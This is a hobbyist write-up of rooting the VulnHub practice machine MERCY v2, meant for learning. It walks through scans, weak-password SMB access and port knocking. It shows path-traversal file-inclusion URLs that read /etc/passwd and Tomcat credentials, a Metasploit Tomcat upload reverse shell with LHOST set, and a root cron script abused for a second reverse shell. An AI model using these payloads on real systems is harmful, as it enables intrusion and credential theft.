MERCY v2 Writeup - VulnHub
Welcome to the writeup of MERCY, a machine dedicated to Offensive Security for the PWK course, and to a great friend of the author.
Welcome to the writeup of MERCY v2, a machine that can be found on VulnHub.
Name: digitalworld.local: MERCY v2
Date release: 28 Dec 2018
Author: Donavan
Series: digitalworld.local
Description: MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.
This machine was deployed using VirtualBox with "Host-Only Adapter" configuration.
|
NMAP
nmap -v -sSV -p 22,53,80,110,139,143,445,993,995,8080 -Pn 192.168.56.101 -T4 -oA nmap/sSV
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernelIdentified a web page on port 8080 (http://192.168.56.101:8080/) running Apache Tomcat.
Used the Gobuster tool to find some interesting directories:
GOBUSTER
gobuster dir -u http://192.168.56.101:8080/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
===============================================================
http://192.168.56.101:8080/docs (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/docs/]
http://192.168.56.101:8080/examples (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/examples/]
http://192.168.56.101:8080/manager (Status: 302) [Size: 0] [--> http://192.168.56.101:8080/manager/]
http://192.168.56.101:8080/robots.txt (Status: 200) [Size: 45]
===============================================================In the /robots.txt directory it was possible to find the page /tryharder/tryharder where is a hash in base64, containing the following message:
|
It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.
Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.
No fluffy bunnies for those who set insecure passwords and endanger the enterprise.
At this point, this found did not mean... but any information is important!
Continuing with the enumeration it was possible to identify some shared folder through SMB.
|
But has nothing to get as "anonymous" user...
With enum4linux tool was possible to enumerate some users:
enum4linux -a 192.168.56.101
[...]
S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)The qiu user caught my attention because of the existence of an SMB directory with this name.
Following the "little poem" from /tryharder/tryharder (I think that this warning didn't work haha D:) I get access to qiu SMB directory using the following credentials:
qiu:password
And with that I managed to log into SMB and find some important folders and files.
|
After downloading the archives and reading them I could find an amazing information in the .private/config file. It's about a "port knocking" configuration that allow you to enable and disable the following ports: 22,80.
|
As initially listed in the first scan, the ports 22 and 80 was filtered. Doing a port knocking following the sequences of the ports mentioned in the print above (.private/config), we will be able to change the status of these ports and interact with them. - Particularly, it's a pretty cool function.
Used hping3 to explore this configuration:
hping3 -S -p 159 -c 1 192.168.56.101; hping3 -S -p 27391 -c 1 192.168.56.101; hping3 -S -p 4 -c 1 192.168.56.101
hping3 -S -p 17301 -c 1 192.168.56.101; hping3 -S -p 28504 -c 1 192.168.56.101; hping3 -S -p 9999 -c 1 192.168.56.101After that the ports were open.
nmap -v -sSV -p 22,80 -Pn 192.168.56.101 -T4 -oN nmap/sSV-APKnock
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:A2:16:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelAccessing the web page on port 80 a loving message is observed o.o
|
Performed a brute-force again with Gobuster I have found 2 interesting pages:
gobuster dir -u http://192.168.56.101/ -w /usr/share/wordlists/dirb/big.txt -e -s "200,301,302,401"
===============================================================
http://192.168.56.101/.htpasswd (Status: 403) [Size: 290]
http://192.168.56.101/.htaccess (Status: 403) [Size: 290]
http://192.168.56.101/robots.txt (Status: 200) [Size: 50]
http://192.168.56.101/server-status (Status: 403) [Size: 294]
http://192.168.56.101/time (Status: 200) [Size: 79]
===============================================================Below is a print of the pages:
- /time
|
Is it information brought directly from the system?
- /robots.txt
|
As we can see at /robots.txt, we have 2 more pages:
- /mercy
|
- /nomercy
|
The last is a "static source code analyser for vulnerabilities in PHP web applications" and contains public exploit that explore the "Multiple Local File Inclusions" vulnerability that exists in RIPS 0.53.
Through this vulnerability I gained access to the /etc/passwd file and confirmed the vulnerability, taking advantage to confirm existing users :p
|
|
http://192.168.56.101/nomercy/windows/code.php?file=../../../../../../../etc/passwd |
As identified in beginning, there is a Tomcat server and on its default index page it was possible to view the path installation. Then used LFI vulnerability to get credentials from Tomat server that is normally in the file /tomcat-users.xml.
|
|
http://192.168.56.101/nomercy/windows/code.php?file=../../../../../var/lib/tomcat7/conf/tomcat-users.xml |
With these credentials I logged into the Tomcat as an administrator and with this permissions its possible to upload and edit everything.
|
To get a reverse shell we can use the upload function in Tomcat Manager but we can use the Metasploit for a easy way...
Used the exploit/multi/http/tomcat_mgr_upload to explore and establish a reverse shell.
set HttpPassword heartbreakisinevitable
set HttpUsername thisisasuperduperlonguser
set RHOSTS 192.168.56.101
set RPORT 8080
set LHOST 192.168.56.104
|
Spoiler → thisisasuperduperlonguser home is troll D:
|
Privilege Escalation
Not many directions and some users /home directories, the credentials found at /tomcat-users.xml worked to switch to fluffy user: fluffy:freakishfluffybunny - but an interactive shell was needed and the python was used for that.
|
Now as fluffy user and at /home there are secrets and interesting things: /.private/secrets
fluffy@MERCY:~/.private/secrets$ ls -la
ls -la
total 20
drwxr-xr-x 2 fluffy fluffy 4096 Nov 20 2018 .
drwxr-xr-x 3 fluffy fluffy 4096 Nov 20 2018 ..
-rwxr-xr-x 1 fluffy fluffy 37 Nov 20 2018 backup.save
-rw-r--r-- 1 fluffy fluffy 12 Nov 20 2018 .secrets
-rwxrwxrwx 1 root root 222 Nov 20 2018 timeclockfluffy@MERCY:~/.private/secrets$ cat timeclock
cat timeclock
#!/bin/bash
now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/timeThe content of timeclock file seems like the /time page that we saw before what appears to run automatically, are owned by root and have full permissions... interesting, isn't it?
So a bash command was added to the file to stablish a reverse shell with my machine.
|
But before, the port 6666 was opened by netcat to wait for this connection.
After netcat was configured and the file changed, the script was run again and the reverse shell was successfully established.
|
NICE! PWNED!!
Finally we got root and now we compromised the whole machine!
Conclusion
This is a really good machine to practice and exercise some base skills and yet it can make you beg for MERCY xD. I recommend you to download it and try it too o/ - if you haven't already...
But of course, I couldn't forget the author's considerations found in the /root directory: author-secret.txt and proof.txt files.
root@MERCY:~# cat author-secret.txt
cat author-secret.txt
Hi! Congratulations on being able to root MERCY.
The author feels bittersweet about this box. On one hand, it was a box designed as a dedication to the sufferance put through by the Offensive Security team for PWK. I thought I would pay it forward by creating a vulnerable machine too. This is not meant to be a particularly difficult machine, but is meant to bring you through a good number of enumerative steps through a variety of techniques.
The author would also like to thank a great friend who he always teases as "plead for mercy". She has been awesome. The author, in particular, appreciates her great heart, candour, and her willingness to listen to the author's rants and troubles. The author will stay forever grateful for her presence. She never needed to be this friendly to the author.
The author, as "plead for mercy" knows, is terrible at any sort of dedication or gifting, and so the best the author could do, I guess, is a little present, which explains the hostname of this box. (You might also have been pleading for mercy trying to root this box, considering its design.)
You'll always be remembered, "plead for mercy", and Offensive Security, for making me plead for mercy!
Congratulations, once again, for you TRIED HARDER!
Regards,
The Author
root@MERCY:~# cat proof.txt
cat proof.txt
Congratulations on rooting MERCY. :-)Thanks for reading and feel free to pingback a coffee ;D
naP0